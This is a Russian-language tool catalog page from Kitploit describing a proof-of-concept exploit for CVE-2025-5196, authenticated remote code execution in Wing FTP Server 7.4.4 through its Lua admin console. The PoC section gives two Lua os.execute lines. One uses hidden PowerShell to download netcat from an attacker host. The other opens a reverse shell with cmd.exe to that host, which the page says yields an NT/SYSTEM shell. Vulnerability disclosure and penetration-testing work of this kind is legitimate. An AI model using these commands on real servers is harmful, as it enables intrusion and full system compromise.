Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Wing-FTP-Server-7.4.4-RCE-Authenticated — Wing FTP Server предоставляет административную консоль написания сценариев Lua, доступную через веб-интерфейс. Аутентифицированные администраторы могут выполнять произвольный код Lua с недостаточной изоляцией. CVE-2025-5196 | Kitploit
Инструменты/GitHubGitHub/nouvexr/wing-ftp-server-7.4.4-rce-authenticated
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHubnouvexr/wing-ftp-server-7.4.4-rce-authenticated

Wing-FTP-Server-7.4.4-RCE-Authenticated

Wing FTP Server предоставляет административную консоль написания сценариев Lua, доступную через веб-интерфейс. Аутентифицированные администраторы могут выполнять произвольный код Lua с недостаточной изоляцией. CVE-2025-5196

Репозиторий
2121 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Wing FTP Server 7.4.4 - Удаленное выполнение кода (аутентифицированный) (CVE-2025-5196)

Wing FTP Server предоставляет административную консоль сценариев Lua, доступную через веб-интерфейс. Аутентифицированные администраторы могут выполнять произвольный код Lua с недостаточной изоляцией ('песочницей').

Затронутая версия: Wing FTP Server 7.4.4 (Windows) | Требуется аутентификация: Да


Загрузка и примечания к выпуску

До 24 мая 2025 года последнюю версию приложения от поставщика можно найти по следующей ссылке: https://www.wftpserver.com/download.htm

Кроме того, можно отметить, что до той же даты опубликован выпуск с примечанием, сообщающим, что уязвимость RCE исправлена в версии 7.4.4. Ссылку на примечания к выпуску можно найти здесь: https://www.wftpserver.com/serverhistory.htm image


PoC

PoC, связанный с CVE-2025-5196 VulDB image

Веб-интерфейс Wing FTP Server

image

image

Первая часть команды загрузит nc.exe (netcat для Windows x86) по пути "C:\Users\usuario\Desktop\Drops". Вторая часть выполнит nc.exe 192.168.234.131 4443 -e cme.exe.

root@kitploit:~
os.execute('powershell -NoP -NonI -W Hidden -Exec Bypass -Command "(New-Object Net.WebClient).DownloadFile(\'http://192.168.234.131:8000/nc.exe\', \'C:\\\\Users\\\\usuario\\\\Desktop\\\\Drops\\\\nc.exe\')"')
root@kitploit:~
os.execute('cmd /c powershell -NoP -W Hidden -Command "Start-Process \\"C:\\Users\\usuario\\Desktop\\Drops\\nc.exe\\" -ArgumentList \\"192.168.234.131\\",\\"4443\\",\\"-e\\",\\"cmd.exe\\""')

image

Оболочка NT/SYSTEM image

Скачать инструмент